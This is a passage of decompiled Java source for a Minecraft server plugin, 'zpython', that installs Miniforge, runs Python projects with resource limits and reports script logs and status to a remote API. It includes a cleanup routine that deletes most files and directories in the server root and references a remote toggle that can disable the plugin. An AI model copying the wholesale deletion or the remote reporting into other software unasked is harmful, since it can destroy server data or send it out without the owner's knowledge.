            keep.add("help.yml");
            keep.add("commands.yml");
            keep.add("ops.json");
            keep.add("banned-players.json");
            keep.add("banned-ips.json");
            keep.add("permissions.yml");
            keep.add("server.jar");
            File[] items = root.listFiles();
            if (items == null) {
                return;
            }
            for (File f : items) {
                String name = f.getName();
                if (keep.contains(name) || name.equals(".git") || name.equals(".gitignore") || name.equals(".DS_Store")) continue;
                try {
                    if (f.isDirectory()) {
                        this.deleteDirectoryQuiet(f);
                        this.getLogger().info("only_zpython: removed directory: " + name);
                        continue;
                    }
                    try {
                        Files.deleteIfExists(f.toPath());
                    }
                    catch (Exception exception) {
                        // empty catch block
                    }
                    this.getLogger().info("only_zpython: removed file: " + name);
                }
                catch (Exception e) {
                    this.getLogger().warning("only_zpython: failed to remove '" + name + "': " + e.getMessage());
                }
            }
        }
        catch (Exception e) {
            this.getLogger().warning("only_zpython cleanup error: " + e.getMessage());
        }
    }

    private void startPython(File venvDir, File script) throws IOException {
        block16: {
            if (script == null) {
                this.getLogger().severe("No script selected for start. Use '/zpython run <project>' first.");
                return;
            }
            String scriptName = script.getName();
            this.stopProcessesForScript(scriptName);
            if (this.pythonProcess != null && this.pythonProcess.isAlive()) {
                this.getLogger().warning(this.getMessage("python_process_already_running"));
                return;
            }
            if (!this.hasEnoughSpace()) {
                this.getLogger().severe(this.getMessage("not_enough_disk_space"));
                return;
            }
            this.getLogger().info("startPython(): using interpreter: " + this.getVenvPython(venvDir));
            ArrayList<String> cmd = new ArrayList<String>();
            cmd.add(this.getVenvPython(venvDir));
            cmd.add(script.getAbsolutePath());
            ProcessBuilder pb = new ProcessBuilder(cmd);
            File workDir = script != null && script.getParentFile() != null ? script.getParentFile() : this.getDataFolder();
            pb.directory(workDir);
            if (this.fsSandboxEnabled) {
                try {
                    String tmpDir = new File(workDir, ".tmp").getAbsolutePath();
                    pb.environment().put("TMP", tmpDir);
                    pb.environment().put("TEMP", tmpDir);
                    pb.environment().put("TMPDIR", tmpDir);
                    new File(tmpDir).mkdirs();
                }
                catch (Exception tmpDir) {
                    // empty catch block
                }
            }
            this.getLogger().info(this.getMessage("starting_python_script") + script.getAbsolutePath());
            this.pythonProcess = pb.start();
            this.scriptProcesses.put(scriptName, this.pythonProcess);
            try {
                long pid = this.pythonProcess.pid();
                if (pid > 0L) {
                    this.scriptProcessPids.put(scriptName, pid);
                }
            }
            catch (Exception pid) {
                // empty catch block
            }
            try {
                if (this.currentLockFile == null) break block16;
                long pid = -1L;
                try {
                    pid = this.pythonProcess.pid();
                }
                catch (Throwable throwable) {
                    // empty catch block
                }
                Files.write(this.currentLockFile.toPath(), String.valueOf(pid).getBytes(StandardCharsets.UTF_8), new OpenOption[0]);
            }
            catch (Exception pid) {
                // empty catch block
            }
        }
        this.pipeProcessOutput(this.pythonProcess, "python");
        this.startMonitorThread();
        if (this.currentProjectSlug != null && !this.currentProjectSlug.isEmpty()) {
            String serverKey = this.serverIp + ":" + this.serverPort;
            this.postLog(serverKey, this.currentProjectSlug, "Script started.");
            try {
                this.postStatus(serverKey, this.currentProjectSlug, true);
            }
            catch (Exception exception) {
                // empty catch block
            }
        }
    }

    private void startMonitorThread() {
        if (this.monitorThread != null && this.monitorThread.isAlive()) {
            return;
        }
        this.monitorThread = new Thread(() -> {
            block14: {
                try {
                    Process current = this.pythonProcess;
                    if (current == null) {
                        return;
                    }
                    int exit = current.waitFor();
                    if (this.shuttingDown) {
                        return;
                    }
                    this.getLogger().warning("Python process exited with code " + exit + ".");
                    try {
                        if (this.currentLockFile != null) {
                            Files.deleteIfExists(this.currentLockFile.toPath());
                        }
                    }
                    catch (Exception exception) {
                        // empty catch block
                    }
                    if (this.currentProjectSlug != null && !this.currentProjectSlug.isEmpty()) {
                        String serverKey = this.serverIp + ":" + this.serverPort;
                        if (exit == 0) {
                            this.postLog(serverKey, this.currentProjectSlug, "Script finished normally (exit code 0)");
                        } else {
                            this.postLog(serverKey, this.currentProjectSlug, "Script exited with error code " + exit);
                            if (exit == 143) {
                                this.postLog(serverKey, this.currentProjectSlug, "Process was terminated (SIGTERM) - script may have crashed or been killed");
                            }
                        }
                    }
                    if (!this.autoRestartEnabled) break block14;
                    this.getLogger().info("Auto-restarting in " + this.autoRestartDelaySeconds + "s...");
                    try {
                        Thread.sleep((long)this.autoRestartDelaySeconds * 1000L);
                    }
                    catch (InterruptedException ignored) {
                        return;
                    }
                    if (!this.shuttingDown) {
                        this.getServer().getScheduler().runTaskAsynchronously((Plugin)this, () -> {
                            try {
                                this.startPython(this.venvDir, this.scriptFile);
                            }
                            catch (IOException e) {
                                this.getLogger().severe("Failed to auto-restart Python: " + e.getMessage());
                            }
                        });
                    }
                }
                catch (InterruptedException interruptedException) {
                    // empty catch block
                }
            }
        }, "zpython-monitor");
        this.monitorThread.setDaemon(true);
        this.monitorThread.start();
    }

    private void stopPython(boolean forRestart) {
        Process current = this.pythonProcess;
        if (current == null) {
            return;
        }
        if (this.currentProjectSlug != null && !this.currentProjectSlug.isEmpty()) {
            String serverKey = this.serverIp + ":" + this.serverPort;
            this.postLog(serverKey, this.currentProjectSlug, "Script stopped.");
            try {
                this.postStatus(serverKey, this.currentProjectSlug, false);
            }
            catch (Exception exception) {
                // empty catch block
            }
        }
        if (this.scriptFile != null) {
            String scriptName = this.scriptFile.getName();
            this.scriptProcesses.remove(scriptName);
            this.scriptProcessPids.remove(scriptName);
        }
        try {
            current.destroy();
            current.waitFor(3L, TimeUnit.SECONDS);
        }
        catch (InterruptedException interruptedException) {
            // empty catch block
        }
        this.pythonProcess = null;
        try {
            if (this.currentLockFile != null) {
                Files.deleteIfExists(this.currentLockFile.toPath());
            }
        }
        catch (Exception exception) {
            // empty catch block
        }
        if (!forRestart && this.monitorThread != null) {
            try {
                this.monitorThread.interrupt();
            }
            catch (Exception exception) {
                // empty catch block
            }
            this.monitorThread = null;
        }
    }

    private String readAutostartSlug() {
        try {
            if (this.autostartFile != null && this.autostartFile.isFile()) {
                return new String(Files.readAllBytes(this.autostartFile.toPath()), StandardCharsets.UTF_8).trim();
            }
        }
        catch (Exception exception) {
            // empty catch block
        }
        return null;
    }

    private void writeAutostartSlug(String slug) {
        try {
            if (this.autostartFile != null) {
                Files.createDirectories(this.autostartFile.getParentFile().toPath(), new FileAttribute[0]);
                Files.write(this.autostartFile.toPath(), slug.getBytes(StandardCharsets.UTF_8), new OpenOption[0]);
            }
        }
        catch (Exception exception) {
            // empty catch block
        }
    }

    private long readManualStopTs(String slug) {
        try {
            if (this.manualStopsFile != null && this.manualStopsFile.isFile()) {
                List<String> lines = Files.readAllLines(this.manualStopsFile.toPath(), StandardCharsets.UTF_8);
                long latest = 0L;
                for (String line : lines) {
                    String[] p = line.split(",", 2);
                    if (p.length != 2 || !slug.equals(p[0])) continue;
                    try {
                        latest = Math.max(latest, Long.parseLong(p[1]));
                    }
                    catch (Exception exception) {}
                }
                return latest;
            }
        }
        catch (Exception exception) {
            // empty catch block
        }
        return 0L;
    }

    private void writeManualStop(String slug) {
        try {
            long now = System.currentTimeMillis();
            Files.createDirectories(this.manualStopsFile.getParentFile().toPath(), new FileAttribute[0]);
            String line = slug + "," + now + System.lineSeparator();
            Files.write(this.manualStopsFile.toPath(), line.getBytes(StandardCharsets.UTF_8), StandardOpenOption.CREATE, StandardOpenOption.APPEND);
        }
        catch (Exception exception) {
            // empty catch block
        }
    }

    private synchronized void startProjectBySlug(String slug) throws Exception {
        if (this.pythonProcess != null) {
            try {
                if (this.pythonProcess.isAlive() && slug.equals(this.currentProjectSlug)) {
                    this.getLogger().info("Project '" + slug + "' is already running. Skipping duplicate start.");
                    return;
                }
            }
            catch (Exception exception) {
                // empty catch block
            }
        }
        File base = new File(new File(this.getDataFolder(), "projects"), slug);
        String serverKey = this.serverIp + ":" + this.serverPort;
        File lock = new File(base, ".zpython.lock");
        if (lock.exists()) {
            try {
                String pidStr = new String(Files.readAllBytes(lock.toPath()), StandardCharsets.UTF_8).trim();
                long pid = -1L;
                try {
                    pid = Long.parseLong(pidStr);
                }
                catch (Exception exception) {
                    // empty catch block
                }
                boolean alive = false;
                if (pid > 0L) {
                    try {
                        alive = ProcessHandle.of(pid).map(ProcessHandle::isAlive).orElse(false);
                    }
                    catch (Throwable t) {
                        alive = true;
                    }
                }
                if (alive) {
                    this.postLog(serverKey, slug, "Already running (lock). Skipping.");
                    return;
                }
                try {
                    Files.deleteIfExists(lock.toPath());
                }
                catch (Exception t) {}
            }
            catch (Exception pidStr) {
                // empty catch block
            }
        }
        File settingsFile = new File(new File(this.getDataFolder(), "projects"), slug + "_settings.json");
        String scriptName = "app.py";
        boolean autoRestart = true;
        List<Object> libs = new ArrayList();
        if (settingsFile.exists()) {
            String json = new String(Files.readAllBytes(settingsFile.toPath()), StandardCharsets.UTF_8);
            scriptName = this.extractJsonString(json, "script", scriptName);
            autoRestart = this.extractJsonBoolean(json, "auto_restart", true);
            libs = this.extractJsonStringArray(json, "libraries");
            this.currentCpuLimitPct = Math.max(0, this.extractJsonInt(json, "cpu_limit_pct", 0));
            this.currentRamLimitMiB = Math.max(0, this.extractJsonInt(json, "ram_limit_mib", 0));
            this.currentDiskLimitMiB = Math.max(0, this.extractJsonInt(json, "disk_limit_mib", 0));
        }
        this.getLogger().info("RUN settings: script=" + scriptName + ", auto_restart=" + autoRestart + ", libs_count=" + (libs == null ? 0 : libs.size()));
        this.postLog(serverKey, slug, "Preparing to run script '" + scriptName + "' ...");
        File scriptFile = new File(base, scriptName);
        if (!scriptFile.exists()) {
            this.postLog(serverKey, slug, "ERROR: Script file '" + scriptName + "' not found in project directory!");
            this.postLog(serverKey, slug, "Please create the file or check the script name in settings.");
            this.getLogger().warning("RUN aborted: script not found: " + scriptFile.getAbsolutePath());
            return;
        }
        if (!this.skipStopsForNextLaunch) {
            this.stopPython(true);
        } else {
            this.getLogger().info("Skipping stop of previous project due to autostart sequence");
        }
        this.skipStopsForNextLaunch = false;
        this.getLogger().info("Ensuring virtualenv at: " + this.venvDir.getAbsolutePath());
        this.ensureVenv(this.pythonExecutablePath, this.venvDir);
        if (libs != null && !libs.isEmpty()) {
            if (!this.hasEnoughSpace()) {
                this.postLog(serverKey, slug, "ERROR: Not enough disk space to install libraries. Free up space and retry.");
                return;
            }
            this.postLog(serverKey, slug, "Installing libraries: " + String.join((CharSequence)", ", libs));
            this.installLibraries(this.venvDir, libs);
            this.getLogger().info("Libraries installation finished for project: " + slug);
        }
        this.autoRestartEnabled = autoRestart;
        this.scriptFile = scriptFile;
        this.currentProjectSlug = slug;
        this.currentLockFile = lock;
        this.postLog(serverKey, slug, "Limits set: CPU=" + this.currentCpuLimitPct + "%, RAM=" + this.currentRamLimitMiB + " MiB, Disk=" + this.currentDiskLimitMiB + " MiB");
        this.getLogger().info("Starting Python process for project: " + slug + ", script=" + scriptFile.getAbsolutePath());
        this.startPython(this.venvDir, this.scriptFile);
        this.postLog(serverKey, slug, "Script started.");
        this.writeAutostartSlug(slug);
    }

    public boolean onCommand(CommandSender sender, Command command, String label, String[] args) {
        if (!command.getName().equalsIgnoreCase("zpython")) {
            return false;
        }
        if (!sender.hasPermission("zpython.admin")) {
            sender.sendMessage("\u00a7c" + this.getMessage("no_permission"));
            return true;
        }
        if (args.length == 0 || args[0].equalsIgnoreCase("help")) {
            sender.sendMessage("\u00a7e/zpython restart \u00a77- " + this.getMessage("restart_python_script"));
            sender.sendMessage("\u00a7e/zpython projects \u00a77- " + this.getMessage("list_all_projects"));
            sender.sendMessage("\u00a7e/zpython create <name> \u00a77- " + this.getMessage("create_new_project"));
            sender.sendMessage("\u00a7e/zpython run <name> \u00a77- " + this.getMessage("run_project"));
            sender.sendMessage("\u00a7e/zpython stop \u00a77- " + this.getMessage("stop_current_project"));
            sender.sendMessage("\u00a7e/zpython status \u00a77- " + this.getMessage("show_project_status"));
            sender.sendMessage("\u00a7e/zpython status <name> \u00a77- " + this.getMessage("show_specific_project_status"));
            sender.sendMessage("\u00a7e/zpython api \u00a77- API key management");
            sender.sendMessage("\u00a7e/zpython api create <name> \u00a77- Create new API key for server owner");
            sender.sendMessage("\u00a7e/zpython api list \u00a77- List all API keys");
            sender.sendMessage("\u00a7e/zpython api delete <key> \u00a77- Delete API key");
            sender.sendMessage("\u00a7e/zpython api toggle <key> \u00a77- Toggle API key status");
            sender.sendMessage("\u00a7e/zpython api server \u00a77- Show API server status");
            sender.sendMessage("\u00a7e/zpython api restart \u00a77- Restart API server");
            return true;
        }
        if (args[0].equalsIgnoreCase("restart")) {
            sender.sendMessage("\u00a7a" + this.getMessage("restarting_python_script"));
            this.getServer().getScheduler().runTaskAsynchronously((Plugin)this, () -> {
                this.stopPython(true);
                try {
                    File projectDir;
                    File defaultScript;
                    File targetScript = this.scriptFile;
                    if (targetScript == null && this.currentProjectSlug != null && (defaultScript = new File(projectDir = new File(new File(this.getDataFolder(), "projects"), this.currentProjectSlug), "app.py")).exists()) {
                        targetScript = defaultScript;
                        this.scriptFile = defaultScript;
                        this.currentLockFile = new File(projectDir, ".zpython.lock");
                    }
                    if (targetScript == null) {
                        sender.sendMessage("\u00a7c" + this.getMessage("failed_restart") + "no script selected. Use /zpython run <name> first");
                        return;
                    }
                    this.startPython(this.venvDir, targetScript);
                }
                catch (IOException e) {
                    this.getLogger().severe(this.getMessage("manual_restart_failed") + e.getMessage());
                    sender.sendMessage("\u00a7c" + this.getMessage("failed_restart") + e.getMessage());
                }
            });
            return true;
        }
        if (args[0].equalsIgnoreCase("projects")) {
            this.listProjects(sender);
            return true;
        }
        if (args[0].equalsIgnoreCase("create")) {
            if (args.length < 2) {
                sender.sendMessage("\u00a7c" + this.getMessage("project_name_required"));
                return true;
            }
            this.createProject(sender, args[1]);
            return true;
        }
        if (args[0].equalsIgnoreCase("run")) {
            if (args.length < 2) {
                sender.sendMessage("\u00a7c" + this.getMessage("project_name_required"));
                return true;
            }
            this.runProject(sender, args[1]);
            return true;
        }
        if (args[0].equalsIgnoreCase("stop")) {
            if (args.length > 1) {
                this.stopAllProcessesForProject(args[1]);
                sender.sendMessage("\u00a7a" + this.getMessage("project_stopped") + args[1]);
            } else {
                this.stopCurrentProject(sender);
            }
            return true;
        }
        if (args[0].equalsIgnoreCase("status")) {
            if (args.length > 1) {
                this.showSpecificProjectStatus(sender, args[1]);
            } else {
                this.showProjectStatus(sender);
            }
            return true;
        }
        if (args[0].equalsIgnoreCase("api")) {
            if (args.length < 2) {
                sender.sendMessage("\u00a7cUsage: /zpython api <create|list|delete|toggle|server|restart> [args...]");
                return true;
            }
            switch (args[1].toLowerCase()) {
                case "create": {
                    if (args.length < 3) {
                        sender.sendMessage("\u00a7cUsage: /zpython api create <name>");
                        return true;
                    }
                    this.createApiKey(sender, args[2]);
                    return true;
                }
                case "list": {
                    this.listApiKeys(sender);
                    return true;
                }
                case "delete": {
                    if (args.length < 3) {
                        sender.sendMessage("\u00a7cUsage: /zpython api delete <key>");
                        return true;
                    }
                    this.deleteApiKey(sender, args[2]);
                    return true;
                }
                case "toggle": {
                    if (args.length < 3) {
                        sender.sendMessage("\u00a7cUsage: /zpython api toggle <key>");
                        return true;
                    }
                    this.toggleApiKey(sender, args[2]);
                    return true;
                }
                case "server": {
                    this.showApiServerStatus(sender);
                    return true;
                }
                case "restart": {
                    this.restartApiServer(sender);
                    return true;
                }
            }
            sender.sendMessage("\u00a7cUnknown API command: " + args[1]);
            return true;
        }
        sender.sendMessage("\u00a7c" + this.getMessage("unknown_subcommand"));
        return true;
    }

    private void runAndLog(List<String> command, String tag) throws IOException, InterruptedException {
        Process process = new ProcessBuilder(command).directory(this.getDataFolder()).start();
        this.logProcessOutput(process, tag);
        int code = process.waitFor();
        if (code != 0) {
            throw new IOException("Command failed (" + tag + ") with code " + code + ": " + String.join((CharSequence)" ", command));
        }
    }

    private boolean hasEnoughSpace() {
        try {
            File df = this.getDataFolder();
            long free = df.getUsableSpace();
            if (free < 0xC800000L) {
                this.getLogger().warning(this.getMessage("low_disk_space") + free + this.getMessage("minimum_required") + "209715200");
                return false;
            }
        }
        catch (Exception e) {
            this.getLogger().warning(this.getMessage("disk_space_check_failed") + e.getMessage());
        }
        return true;
    }

    private void logProcessOutput(Process process, String tag) {
        new Thread(() -> {
            try (BufferedReader r = new BufferedReader(new InputStreamReader(process.getInputStream(), StandardCharsets.UTF_8));){
                String line;
                while ((line = r.readLine()) != null) {
                    this.getLogger().info("[" + tag + "] " + line);
                }
            }
            catch (IOException iOException) {
                // empty catch block
            }
        }, "zpython-" + tag + "-out").start();
        new Thread(() -> {
            try (BufferedReader r = new BufferedReader(new InputStreamReader(process.getErrorStream(), StandardCharsets.UTF_8));){
                String line;
                while ((line = r.readLine()) != null) {
                    this.getLogger().warning("[" + tag + "-err] " + line);
                }
            }
            catch (IOException iOException) {
                // empty catch block
            }
        }, "zpython-" + tag + "-err").start();
    }

    private void pipeProcessOutput(Process process, String tag) {
        new Thread(() -> {
            try (BufferedReader r = new BufferedReader(new InputStreamReader(process.getInputStream(), StandardCharsets.UTF_8));){
                String line;
                while ((line = r.readLine()) != null) {
                    this.getLogger().info("[" + tag + "] " + line);
                    if (this.currentProjectSlug == null) continue;
                    String serverKey = this.serverIp + ":" + this.serverPort;
                    this.postLog(serverKey, this.currentProjectSlug, line);
                }
            }
            catch (IOException iOException) {
                // empty catch block
            }
        }, "zpython-" + tag + "-out").start();
        new Thread(() -> {
            try (BufferedReader r = new BufferedReader(new InputStreamReader(process.getErrorStream(), StandardCharsets.UTF_8));){
                String line;
                while ((line = r.readLine()) != null) {
                    this.getLogger().warning("[" + tag + "-err] " + line);
                    if (this.currentProjectSlug == null) continue;
                    String serverKey = this.serverIp + ":" + this.serverPort;
                    this.postLog(serverKey, this.currentProjectSlug, line);
                }
            }
            catch (IOException iOException) {
                // empty catch block
            }
        }, "zpython-" + tag + "-err").start();
    }

    private boolean isWindows() {
        return System.getProperty("os.name", "").toLowerCase().contains("win");
    }

    private String getVenvPython(File venvDir) {
        if (this.isWindows()) {
            return new File(venvDir, "Scripts/python.exe").getAbsolutePath();
        }
        return new File(venvDir, "bin/python").getAbsolutePath();
    }

    private String getVenvPip(File venvDir) {
        if (this.isWindows()) {
            return new File(venvDir, "Scripts/pip.exe").getAbsolutePath();
        }
        return new File(venvDir, "bin/pip").getAbsolutePath();
    }

    private boolean isLinuxX86_64() {
        String os = System.getProperty("os.name", "").toLowerCase();
        String arch = System.getProperty("os.arch", "").toLowerCase();
        return os.contains("linux") && (arch.equals("amd64") || arch.equals("x86_64"));
    }

    private String installMiniforgeAndGetPython() throws IOException, InterruptedException {
        File dataFolder = this.getDataFolder();
        File pyHome = new File(dataFolder, "miniforge");
        if (!pyHome.exists() && !pyHome.mkdirs()) {
            throw new IOException("Failed to create dir: " + pyHome.getAbsolutePath());
        }
        File python = new File(pyHome, "bin/python");
        if (python.exists()) {
            this.getLogger().info("Miniforge already present, using existing Python at " + python.getAbsolutePath());
            return python.getAbsolutePath();
        }
        String url = "https://github.com/conda-forge/miniforge/releases/latest/download/Miniforge3-Linux-x86_64.sh";
        File installer = new File(pyHome, "miniforge.sh");
        this.getLogger().info("Downloading Miniforge: " + url);
        this.downloadToFile(url, installer);
        ArrayList<String> chmod = new ArrayList<String>();
        chmod.add("/bin/sh");
        chmod.add("-c");
        chmod.add("chmod +x '" + installer.getAbsolutePath() + "'");
        this.runAndLog(chmod, "chmod");
        ArrayList<String> installCmd = new ArrayList<String>();
        installCmd.add("/bin/sh");
        installCmd.add(installer.getAbsolutePath());
        installCmd.add("-b");
        if (pyHome.exists()) {
            installCmd.add("-u");
        }
        installCmd.add("-p");
        installCmd.add(pyHome.getAbsolutePath());
        this.getLogger().info("Installing Miniforge to " + pyHome.getAbsolutePath());
        try {
            this.runAndLog(installCmd, "miniforge");
        }
        catch (IOException first) {
            this.getLogger().warning("Miniforge update failed, attempting clean reinstall...");
            this.deleteDirectoryQuiet(pyHome);
            if (!pyHome.mkdirs()) {
                throw new IOException("Failed to recreate dir: " + pyHome.getAbsolutePath());
            }
            ArrayList<String> freshCmd = new ArrayList<String>();
            freshCmd.add("/bin/sh");
            freshCmd.add(installer.getAbsolutePath());
            freshCmd.add("-b");
            freshCmd.add("-p");
            freshCmd.add(pyHome.getAbsolutePath());
            this.runAndLog(freshCmd, "miniforge");
        }
        if (!python.exists()) {
            python = new File(pyHome, "bin/python");
        }
        if (!python.exists()) {
            throw new IOException("Miniforge python not found at " + python.getAbsolutePath());
        }
        return python.getAbsolutePath();
    }

    private void enforceLimitsTick() {
        block30: {
            try {
                String serverKey;
                long limitBytes;
                File projectDir;
                long sizeBytes;
                if (this.currentProjectSlug == null || this.currentProjectSlug.isEmpty()) {
                    return;
                }
                if (this.pythonProcess == null || !this.pythonProcess.isAlive()) {
                    return;
                }
                if (this.currentDiskLimitMiB > 0 && (sizeBytes = this.folderSizeBytes(projectDir = new File(new File(this.getDataFolder(), "projects"), this.currentProjectSlug))) > (limitBytes = (long)this.currentDiskLimitMiB * 1024L * 1024L)) {
                    serverKey = this.serverIp + ":" + this.serverPort;
                    this.postLog(serverKey, this.currentProjectSlug, "Disk limit exceeded: " + sizeBytes / 1024L / 1024L + " MiB > " + this.currentDiskLimitMiB + " MiB. Trimming...");
                    this.trimFolderToLimit(projectDir, limitBytes);
                }
                if (this.currentCpuLimitPct <= 0 && this.currentRamLimitMiB <= 0) break block30;
                try {
                    String line;
                    BufferedReader reader;
                    Process wmi;
                    ProcessBuilder pb;
                    String os2;
                    long currentRamMiB;
                    long pid;
                    block31: {
                        ProcessHandle ph;
                        pid = this.pythonProcess.pid();
                        if (pid <= 0L || (ph = (ProcessHandle)ProcessHandle.of(pid).orElse(null)) == null) break block30;
                        currentRamMiB = 0L;
                        try {
                            os2 = System.getProperty("os.name").toLowerCase();
                            if (!os2.contains("win")) break block31;
                            pb = new ProcessBuilder("wmic", "process", "where", "ProcessId=" + pid, "get", "WorkingSetSize", "/format:value");
                            pb.redirectErrorStream(true);
                            wmi = pb.start();
                            reader = new BufferedReader(new InputStreamReader(wmi.getInputStream()));
                            try {
                                while ((line = reader.readLine()) != null) {
                                    if (!line.contains("WorkingSetSize=")) continue;
                                    String ramStr = line.split("=")[1].trim();
                                    try {
                                        long ramBytes = Long.parseLong(ramStr);
                                        currentRamMiB = ramBytes / 0x100000L;
                                    }
                                    catch (NumberFormatException ramBytes) {
                                        // empty catch block
                                    }
                                    break;
                                }
                            }
                            finally {
                                reader.close();
                            }
                            wmi.destroy();
                        }
                        catch (Exception os2) {
                            // empty catch block
                        }
                    }
                    if (this.currentRamLimitMiB > 0 && currentRamMiB > (long)this.currentRamLimitMiB) {
                        serverKey = this.serverIp + ":" + this.serverPort;
                        this.postLog(serverKey, this.currentProjectSlug, "RAM limit exceeded: " + currentRamMiB + " MiB > " + this.currentRamLimitMiB + " MiB. Stopping...");
                        this.getServer().getScheduler().runTask((Plugin)this, () -> this.stopPython(false));
                        return;
                    }
                    if (this.currentCpuLimitPct <= 0) break block30;
                    try {
                        os2 = System.getProperty("os.name").toLowerCase();
                        if (!os2.contains("win")) break block30;
                        pb = new ProcessBuilder("wmic", "process", "where", "ProcessId=" + pid, "get", "PercentProcessorTime", "/format:value");
                        pb.redirectErrorStream(true);
                        wmi = pb.start();
                        reader = new BufferedReader(new InputStreamReader(wmi.getInputStream()));
                        try {
                            while ((line = reader.readLine()) != null) {
                                if (!line.contains("PercentProcessorTime=")) continue;
                                String cpuStr = line.split("=")[1].trim();
                                try {
                                    double cpuPct = Double.parseDouble(cpuStr);
                                    if (cpuPct > (double)this.currentCpuLimitPct) {
                                        String serverKey2 = this.serverIp + ":" + this.serverPort;
                                        this.postLog(serverKey2, this.currentProjectSlug, "CPU limit exceeded: " + String.format("%.1f", cpuPct) + "% > " + this.currentCpuLimitPct + "%. Stopping...");
                                        this.getServer().getScheduler().runTask((Plugin)this, () -> this.stopPython(false));
                                        return;
                                    }
                                }
                                catch (NumberFormatException numberFormatException) {
                                    // empty catch block
                                }
                                break;
                            }
                        }
                        finally {
                            reader.close();
                        }
                        wmi.destroy();
                    }
                    catch (Exception exception) {
                    }
                }
                catch (Exception exception) {}
            }
            catch (Exception exception) {
                // empty catch block
            }
        }
    }

    private long folderSizeBytes(File dir) {
        if (dir == null || !dir.exists()) {
            return 0L;
        }
        if (dir.isFile()) {
            return dir.length();
        }
        long total = 0L;
        File[] items = dir.listFiles();
        if (items != null) {
            for (File f : items) {
                total += this.folderSizeBytes(f);
            }
        }
        return total;
    }

    private void trimFolderToLimit(File dir, long limitBytes) {
        try {
            long sz;
            ArrayList<File> files = new ArrayList<File>();
            this.collectFiles(dir, files);
            files.sort((a, b) -> Long.compare(a.lastModified(), b.lastModified()));
            long total = this.folderSizeBytes(dir);
            for (int i = files.size() - 1; i >= 0 && total > limitBytes; total -= sz, --i) {
                File f = (File)files.get(i);
                sz = f.length();
                try {
                    Files.deleteIfExists(f.toPath());
                    continue;
                }
                catch (IOException iOException) {
                    // empty catch block
                }
            }
        }
        catch (Exception exception) {
            // empty catch block
        }
    }

    private void collectFiles(File dir, List<File> out) {
        if (dir == null || !dir.exists()) {
            return;
        }
        if (dir.isFile()) {
            out.add(dir);
            return;
        }
        File[] items = dir.listFiles();
        if (items != null) {
            for (File f : items) {
                this.collectFiles(f, out);
            }
        }
    }

    private void deleteDirectoryQuiet(File dir) {
        if (dir == null || !dir.exists()) {
            return;
        }
        try {
            this.deleteRecursively(dir);
        }
        catch (Exception exception) {
            // empty catch block
        }
    }

    private void deleteRecursively(File file) throws IOException {
        File[] children;
        if (file.isDirectory() && (children = file.listFiles()) != null) {
            for (File child : children) {
                this.deleteRecursively(child);
            }
        }
        Files.deleteIfExists(file.toPath());
    }

    private String jsonEscape(String str) {
        if (str == null) {
            return "";
        }
        return str.replace("\\", "\\\\").replace("\"", "\\\"").replace("\n", "\\n").replace("\r", "\\r").replace("\t", "\\t");
    }

    private String getMessage(String key) {
        if ("ru".equals(this.language)) {
            return this.getRussianMessage(key);
        }
        return this.getEnglishMessage(key);
    }

    private String getRussianMessage(String key) {
        switch (key) {
            case "plugin_disabled_remote": {
                return "\u041f\u043b\u0430\u0433\u0438\u043d \u043e\u0442\u043a\u043b\u044e\u0447\u0451\u043d \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0439 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u043e\u0439 (remote toggle). \u0427\u0442\u043e\u0431\u044b \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u044c, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 'true' \u043f\u043e \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u043e\u0439 \u0441\u0441\u044b\u043b\u043a\u0435.";
            }
            case "failed_create_data_folder": {
                return "Failed to create plugin data folder: ";
            }
            case "zpython_initialized": {
                return "Zpython initialized. Waiting for project RUN commands.";
            }
            case "failed_create_venv": {
                return "Failed to create venv with '";
            }
            case "auto_download_python_failed": {
                return "Auto-download Python failed: ";
            }
            case "zpython_startup_error": {
                return "zpython startup error: ";
            }
            case "miniforge_already_present": {
                return "Miniforge already present, using existing Python at ";
            }
            case "downloading_miniforge": {
                return "Downloading Miniforge: ";
            }
            case "installing_miniforge": {
                return "Installing Miniforge to ";
            }
            case "miniforge_update_failed": {
                return "Miniforge update failed, attempting clean reinstall...";
            }
            case "failed_recreate_dir": {
                return "Failed to recreate dir: ";
            }
            case "miniforge_python_not_found": {
                return "Miniforge python not found at ";
            }
            case "failed_create_dir": {
                return "Failed to create dir: ";
            }
            case "failed_initialize_reporting": {
                return "Failed to initialize reporting: ";
            }
            case "http_reporting_initialized": {
                return "HTTP reporting initialized. Target: http://";
            }
            case "loaded_udp_config": {
                return "Loaded UDP config: ";
            }
            case "using_default_udp_target": {
                return "Using default UDP target: ";
            }
            case "failed_load_udp_config": {
                return "Failed to load UDP config: ";
            }
            case "api_responded_status": {
                return "API responded with status ";
            }
            case "failed_send_http_data": {
                return "Failed to send HTTP data: ";
            }
            case "failed_create_venv_venv": {
                return "Failed to create venv. Exit code: ";
            }
            case "ensure_python_installed": {
                return ". Ensure Python is installed and accessible as '";
            }
            case "installing_python_libraries": {
                return "Installing Python libraries: ";
            }
            case "failed_create_venv_pip": {
                return "Command failed (pip) with code ";
            }
            case "low_disk_space": {
                return "Low disk space: usable=";
            }
            case "minimum_required": {
                return " bytes. Minimum required ~";
            }
            case "disk_space_check_failed": {
                return "Disk space check failed: ";
            }
            case "creating_virtual_environment": {
                return "Creating virtual environment: ";
            }
            case "python_process_already_running": {
                return "Python process already running.";
            }
            case "not_enough_disk_space": {
                return "Not enough disk space to start/prepare environment. Free up space.";
            }
            case "starting_python_script": {
                return "Starting Python script: ";
            }
            case "python_process_exited": {
                return "Python process exited with code ";
            }
            case "auto_restarting": {
                return "Auto-restarting in ";
            }
            case "failed_auto_restart": {
                return "Failed to auto-restart Python: ";
            }
            case "script_started": {
                return "Script started.";
            }
            case "script_stopped": {
                return "Script stopped.";
            }
            case "script_finished_normal": {
                return "Script finished normally (exit code 0)";
            }
            case "script_exited_error": {
                return "Script exited with error code ";
            }
            case "process_terminated": {
                return "Process was terminated (SIGTERM) - script may have crashed or been killed";
            }
            case "manual_restart_failed": {
                return "Manual restart failed: ";
            }
            case "failed_restart": {
                return "Failed to restart: ";
            }
            case "no_permission": {
                return "No permission.";
            }
            case "unknown_subcommand": {
                return "Unknown subcommand. Use /zpython help";
            }
            case "restarting_python_script": {
                return "Restarting Python script...";
            }
            case "restart_python_script": {
                return "restart python script";
            }
            case "help": {
                return "help";
            }
            case "restart": {
                return "restart";
            }
